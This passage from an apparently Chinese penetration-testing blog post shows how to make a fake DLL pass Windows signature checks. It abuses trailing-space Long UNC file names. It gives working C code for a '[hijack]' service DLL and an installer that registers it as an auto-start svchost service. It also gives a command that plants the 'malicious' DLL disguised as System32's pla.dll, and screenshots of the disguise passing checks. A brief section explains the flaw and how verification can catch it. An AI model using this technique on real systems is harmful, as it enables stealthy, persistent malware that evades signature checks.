class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dllmain.cpp : 定义 DLL 应用程序的入口点。</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> serviceName <span class="meta-string">L&quot;svchost&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;pch.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;wchar.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;malloc.h&gt;</span></span></span><br><span class="line">HANDLE g_hModule = <span class="number">0</span>;</span><br><span class="line">SERVICE_STATUS_HANDLE hStatus = <span class="number">0</span>;</span><br><span class="line">SERVICE_STATUS ss;</span><br><span class="line">DWORD aexit;</span><br><span class="line"></span><br><span class="line"><span class="function">VOID WINAPI <span class="title">handler</span><span class="params">(DWORD code)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function">BOOL APIENTRY <span class="title">DllMain</span><span class="params">(HMODULE hModule,</span></span></span><br><span class="line"><span class="function"><span class="params">    DWORD  ul_reason_for_call,</span></span></span><br><span class="line"><span class="function"><span class="params">    LPVOID lpReserved</span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"></span><br><span class="line">    g_hModule = hModule;</span><br><span class="line">    <span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span></span><br><span class="line">__declspec(dllexport)</span><br><span class="line"><span class="function"><span class="keyword">void</span> WINAPI <span class="title">ServiceMain</span><span class="params">(<span class="keyword">int</span> argv, <span class="keyword">wchar_t</span>* argc[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">//初始化</span></span><br><span class="line">    HANDLE file;</span><br><span class="line">    aexit = <span class="number">0</span>;</span><br><span class="line">    ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;</span><br><span class="line">    ss.dwCurrentState = SERVICE_STOPPED;</span><br><span class="line">    <span class="comment">// 设置服务可以使用的控制</span></span><br><span class="line">    <span class="comment">// 如果希望服务启动后不能停止，去掉SERVICE_ACCEPT_STOP</span></span><br><span class="line">    <span class="comment">// SERVICE_ACCEPT_PAUSE_CONTINUE是服务可以“暂停/继续”</span></span><br><span class="line">    ss.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;</span><br><span class="line">    ss.dwWin32ExitCode = <span class="number">0</span>;</span><br><span class="line">    ss.dwServiceSpecificExitCode = <span class="number">0</span>;</span><br><span class="line">    ss.dwCheckPoint = <span class="number">0</span>;</span><br><span class="line">    ss.dwWaitHint = <span class="number">0</span>;</span><br><span class="line">    hStatus = RegisterServiceCtrlHandlerW(argc[<span class="number">0</span>], handler);</span><br><span class="line">    <span class="keyword">if</span> (hStatus == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        OutputDebugString(<span class="string">L&quot;RegisterServiceCtrlHandlerW hStatus == 0&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//设置为启动状态</span></span><br><span class="line">    ss.dwCurrentState = SERVICE_START_PENDING;</span><br><span class="line">    SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line">    ss.dwCurrentState = SERVICE_RUNNING;</span><br><span class="line">    SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//服务运行循环</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        Sleep(<span class="number">1000</span>);</span><br><span class="line">        <span class="keyword">if</span> (aexit == <span class="number">1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        OutputDebugString(<span class="string">L&quot;runing!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//服务循环退出后将设置退出状态</span></span><br><span class="line">    ss.dwCurrentState = SERVICE_STOPPED;</span><br><span class="line">    SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function">VOID WINAPI <span class="title">handler</span><span class="params">(DWORD code)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">switch</span> (code)</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">case</span> SERVICE_CONTROL_STOP:</span><br><span class="line">        ss.dwCurrentState = SERVICE_STOP_PENDING;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        ss.dwCurrentState = SERVICE_STOPPED;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line">        aexit = <span class="number">1</span>;</span><br><span class="line">        OutputDebugString(<span class="string">L&quot;[hijack] service is stopped...&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">case</span> SERVICE_CONTROL_PAUSE:</span><br><span class="line">        ss.dwCurrentState = SERVICE_PAUSE_PENDING;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        ss.dwCurrentState = SERVICE_PAUSED;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        OutputDebugString(<span class="string">L&quot;[hijack] service is PAUSE...&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> SERVICE_CONTROL_CONTINUE:</span><br><span class="line">        ss.dwCurrentState = SERVICE_CONTINUE_PENDING;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        ss.dwCurrentState = SERVICE_RUNNING;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        OutputDebugString(<span class="string">L&quot;[hijack] service is CONTINUE...&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> SERVICE_CONTROL_SHUTDOWN:</span><br><span class="line">        ss.dwCurrentState = SERVICE_STOP_PENDING;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line"></span><br><span class="line">        ss.dwCurrentState = SERVICE_STOPPED;</span><br><span class="line">        SetServiceStatus(hStatus, &amp;ss);</span><br><span class="line">        aexit = <span class="number">1</span>;</span><br><span class="line">        OutputDebugString(<span class="string">L&quot;[hijack] service is stopped...&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>LoadSvchostDll.exe代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;wchar.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> serviceName <span class="meta-string">&quot;svchost&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> WserviceName <span class="meta-string">L&quot;svchost&quot;</span></span></span><br><span class="line"></span><br><span class="line">HANDLE g_hModule = <span class="number">0</span>;</span><br><span class="line">SERVICE_STATUS_HANDLE hStatus = <span class="number">0</span>;</span><br><span class="line">SERVICE_STATUS ss = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">DWORD dwExit = <span class="number">0</span>;</span><br><span class="line"><span class="function">DWORD <span class="title">Install</span><span class="params">(<span class="keyword">const</span> WCHAR* modulePath)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    SC_HANDLE hScm = <span class="number">0</span>;</span><br><span class="line">    SC_HANDLE hSer = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">char</span> groupName[] = <span class="string">&quot;svctest&quot;</span>;</span><br><span class="line">    <span class="keyword">char</span> fullPath[<span class="number">128</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">    <span class="comment">//WCHAR modulePath[MAX_PATH] = &#123; 0 &#125;;</span></span><br><span class="line">    HKEY hMainKey = HKEY_LOCAL_MACHINE;</span><br><span class="line">    HKEY hSubKey = <span class="number">0</span>, htemp;</span><br><span class="line">    DWORD result, lpcbMaxValueLen, valueType, valueSize, dtemp;</span><br><span class="line">    BYTE* value;</span><br><span class="line">    result = RegOpenKeyExW(hMainKey, <span class="string">L&quot;software\\microsoft\\windows nt\\currentversion\\svchost&quot;</span>, <span class="number">0</span>, KEY_SET_VALUE | KEY_QUERY_VALUE, &amp;hSubKey);</span><br><span class="line">    <span class="keyword">if</span> (result != ERROR_SUCCESS)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">    &#125;</span><br><span class="line">    RegQueryInfoKeyW(hSubKey, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, &amp;lpcbMaxValueLen, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    value = (BYTE*)<span class="built_in">malloc</span>(lpcbMaxValueLen + <span class="number">24</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memset</span>(value, <span class="number">0</span>, lpcbMaxValueLen + <span class="number">24</span>);</span><br><span class="line">    valueSize = lpcbMaxValueLen + <span class="number">24</span>;</span><br><span class="line">    result = RegQueryValueExA(hSubKey, groupName, <span class="number">0</span>, &amp;valueType, value, &amp;valueSize);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment">//找服务组,如果找到则在找是否本服务已加入,没有就加入否则退出, 如果没有找到服务组则创建服务组并向该</span></span><br><span class="line">    <span class="comment">//服务组添加本服务</span></span><br><span class="line">    <span class="keyword">if</span> (result == ERROR_SUCCESS) <span class="comment">//找到服务组</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">memcpy</span>(value + valueSize - <span class="number">1</span>, serviceName, <span class="built_in">strlen</span>(serviceName) + <span class="number">1</span>);</span><br><span class="line">        <span class="built_in">memset</span>(value + valueSize + <span class="built_in">strlen</span>(serviceName), <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line">        <span class="comment">//RegSetValueExW 如果值名不存在则添加,然后写入数据,注意写入数据的格式REG_MULTI_SZ与长度</span></span><br><span class="line">        result = RegSetValueExA(hSubKey, groupName, <span class="number">0</span>, REG_MULTI_SZ, (BYTE*)value, valueSize + <span class="built_in">strlen</span>(serviceName) + <span class="number">1</span>);</span><br><span class="line">        <span class="built_in">free</span>(value);</span><br><span class="line">        RegCloseKey(hSubKey);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">memcpy</span>(value, serviceName, <span class="built_in">strlen</span>(serviceName) + <span class="number">1</span>);</span><br><span class="line">        <span class="built_in">memset</span>(value + <span class="built_in">strlen</span>(serviceName) + <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line">        valueSize = <span class="built_in">strlen</span>(serviceName) + <span class="number">2</span>;</span><br><span class="line">        <span class="comment">//RegSetValueExW 如果值名不存在则添加,然后写入数据,注意写入数据的格式REG_MULTI_SZ与长度</span></span><br><span class="line">        result = RegSetValueExA(hSubKey, groupName, <span class="number">0</span>, REG_MULTI_SZ, (BYTE*)value, valueSize);</span><br><span class="line">        <span class="built_in">free</span>(value);</span><br><span class="line">        RegCloseKey(hSubKey);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (result != ERROR_SUCCESS)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment">//打开服务管理器</span></span><br><span class="line">    hScm = OpenSCManagerW(<span class="number">0</span>, <span class="number">0</span>, SC_MANAGER_ALL_ACCESS);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (hScm == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        wprintf(<span class="string">L&quot;OpenSCManagerW error code is %d\n&quot;</span>, GetLastError());</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">sprintf</span>(fullPath, <span class="string">&quot;c:\\windows\\system32\\svchost.exe -k %s&quot;</span>, groupName);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//创建该服务</span></span><br><span class="line">    hSer = CreateServiceA(hScm, serviceName, serviceName, SERVICE_ALL_ACCESS, SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, fullPath, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (hSer == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        wprintf(<span class="string">L&quot;CreateServiceW error code is %d\n&quot;</span>, GetLastError());</span><br><span class="line">        CloseServiceHandle(hScm);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">sprintf</span>(fullPath, <span class="string">&quot;system\\currentcontrolset\\services\\%s&quot;</span>, serviceName);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//服务创建成功,这里就会打开</span></span><br><span class="line">    result = RegOpenKeyExA(hMainKey, fullPath, <span class="number">0</span>, KEY_ALL_ACCESS, &amp;hSubKey);</span><br><span class="line">    <span class="keyword">if</span> (result != ERROR_SUCCESS)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//添加Parameters键</span></span><br><span class="line">    result = RegCreateKeyExW(hSubKey, <span class="string">L&quot;Parameters&quot;</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, KEY_ALL_ACCESS, <span class="number">0</span>, &amp;htemp, &amp;dtemp);</span><br><span class="line">    <span class="keyword">if</span> (result != ERROR_SUCCESS)</span><br><span class="line">    &#123;</span><br><span class="line">        RegCloseKey(hSubKey);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;<span class="comment">//给Parameters键添加值名ServiceDll, 数据就是dll路径</span></span><br><span class="line">    result = RegSetValueExW(htemp, <span class="string">L&quot;ServiceDll&quot;</span>, <span class="number">0</span>, REG_EXPAND_SZ, (PBYTE)modulePath, wcslen(modulePath) * <span class="keyword">sizeof</span>(WCHAR) + <span class="number">2</span>);</span><br><span class="line">    RegCloseKey(hSubKey);</span><br><span class="line">    RegCloseKey(htemp);</span><br><span class="line"></span><br><span class="line">    StartServiceW(hSer, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (hSer)    CloseServiceHandle(hSer);</span><br><span class="line">    <span class="keyword">if</span> (hScm)   CloseServiceHandle(hScm);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">wmain</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Install(<span class="string">L&quot;C:\\Windows\\System32\\pla~1.dll&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>将恶意svchost.dll伪装为系统的pla.dll:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">type</span> svchost.dll &gt; <span class="string">&quot;\\?\C:\Windows\System32\pla.dll &quot;</span></span><br></pre></td></tr></table></figure>
<p>运行LoadSvchostDll.exe注册并加载服务，可以看到服务已运行：</p>
<p><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/srv_dll_running.png" alt="srv_dll_running.png"></p>
<p>使用ProcessExplorer查看，伪装很成功：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/px_srvdll_verify.png" alt="px_srvdll_verify.png"></p>
<p>使用PCHunter查看，服务签名验证可以通过，模块文件签名验证仍然不行：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_srvdll_verify.png" alt="pchunter_srvdll_verify.png"></p>
<p><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/pchunter_srvdll_no_verify.png" alt="pchunter_srvdll_no_verify.png"></p>
<h2 id="原理浅析"><a href="#原理浅析" class="headerlink" title="原理浅析"></a>原理浅析</h2><p>以sigcheck64.exe为例，调用<code>CraeteFile</code>和<code>WinVerifyTrust</code>可以准确区分系统文件和伪装文件的路径；在使用<code>FindFirstFileW</code>函数获取路径后，文件名会保存在<code>WIN32_FIND_DATAW</code>结构体的<code>cFileName</code>成员中，但是对于Long UNC的文件名，此时<code>WIN32_FIND_DATAW.cFileName</code>保存的是带空格的文件名<code>&quot;calc.exe &quot;</code>，又因为系统会忽略末尾的空格，导致后续校验文件时，使用的是原始的计算器路径<code>C:\Windows\System32\calc.exe</code>；如果手工修改<code>WIN32_FIND_DATAW.cFileName</code>为<code>calc~1.exe</code>（或者使用能够保存短文件名的<code>cAlternateFileName</code>替代<code>cFileName</code>），就可以对伪造calc.exe的路径做校验，此时校验失败：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Sigcheck v2.90 - File version and signature viewer</span><br><span class="line">Copyright (C) 2004-2022 Mark Russinovich</span><br><span class="line">Sysinternals - www.sysinternals.com</span><br><span class="line"></span><br><span class="line">c:\windows\system32\calc~1.exe:</span><br><span class="line">        Verified:       Unsigned</span><br><span class="line">        Link date:      10:31 2006/10/15</span><br><span class="line">        Publisher:      n/a</span><br><span class="line">        Company:        keir.net</span><br><span class="line">        Description:    File hasher</span><br><span class="line">        Product:        Hash</span><br><span class="line">        Prod version:   1, 0, 4, 0</span><br><span class="line">        File version:   1, 0, 4, 0</span><br><span class="line">        MachineType:    32-bit</span><br></pre></td></tr></table></figure>
<p>其实对比之前欺骗成功的路径，可以发现sigcheck64显示的文件路径并不是我们传递的路径：<br><img src="/2023/08/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97%E4%BC%AA%E9%80%A0Catalog%E7%AD%BE%E5%90%8D/error_path.png" alt="error_path.png"></p>
<p>微软关于文件名的规定：</p>
<p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-CN/troubleshoot/windows-client/shell-experience/file-folder-name-whitespace-characters">https://learn.microsoft.com/zh-CN/troubleshoot/windows-client/shell-experience/file-folder-name-whitespace-characters</a></p>
<blockquote>
<p>摘要</p>
<p>将保存以 ASCII 空格 (0x20) 开头或结尾的文件和文件夹名称，而不使用这些字符。 以 ASCII 周期 (0x2E) 字符结尾的文件和文件夹名称也将在没有此字符的情况下保存。 将保留所有其他尾随或前导空格字符。</p>
<p>对象管理器</p>
<p>创建时，对象管理器会删除文件或文件夹名称开头或结尾的 ASCII 空格 (0x20) 字符。</p>
<p>创建时，对象管理器会删除文件或文件夹名称末尾的 ASCII 周期 (0x2E) 字符。</p>
<p>对象管理器会保留所有其他前导或尾随空格字符。</p>
</blockquote>
<h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h2><p>参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/30255849">https://zhuanlan.zhihu.com/p/30255849</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bonelee/p/16482684.html">https://www.cnblogs.com/bonelee/p/16482684.html</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%AD%BE%E5%90%8D/" rel="tag"># 签名</a>
              <a href="/tags/%E6%9C%8D%E5%8A%A1/" rel="tag"># 服务</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/05/07/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/ICMP%E9%9A%A7%E9%81%93%E5%8E%9F%E7%90%86%E4%B8%8E%E6%A3%80%E6%B5%8B/" rel="prev" title="ICMP隧道原理与检测">
                  <i class="fa fa-chevron-left"></i> ICMP隧道原理与检测
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/08/05/%E9%80%86%E5%90%91/WTSEnumerateProcessesExA-%E8%BF%9B%E7%A8%8B%E5%90%8D%E6%88%AA%E6%96%AD%E9%97%AE%E9%A2%98%E5%88%86%E6%9E%90/" rel="next" title="WTSEnumerateProcessesExA_进程名截断问题分析">
                  WTSEnumerateProcessesExA_进程名截断问题分析 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">schip</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="/js/local-search.js"></script>





  <script>
    NProgress.configure({
      showSpinner: true
    });
    NProgress.start();
    document.addEventListener('readystatechange', () => {
      if (document.readyState === 'interactive') {
        NProgress.inc(0.8);
      }
      if (document.readyState === 'complete') {
        NProgress.done();
      }
    });
    document.addEventListener('pjax:send', () => {
      NProgress.start();
    });
    document.addEventListener('pjax:success', () => {
      NProgress.done();
    });
  </script>

  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  <script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'none'
      },
      options: {
        renderActions: {
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              const target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    const script = document.createElement('script');
    script.src = '//cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js';
    script.defer = true;
    document.head.appendChild(script);
  } else {
    MathJax.startup.document.state(0);
    MathJax.typesetClear();
    MathJax.texReset();
    MathJax.typeset();
  }
</script>



</body>
</html>
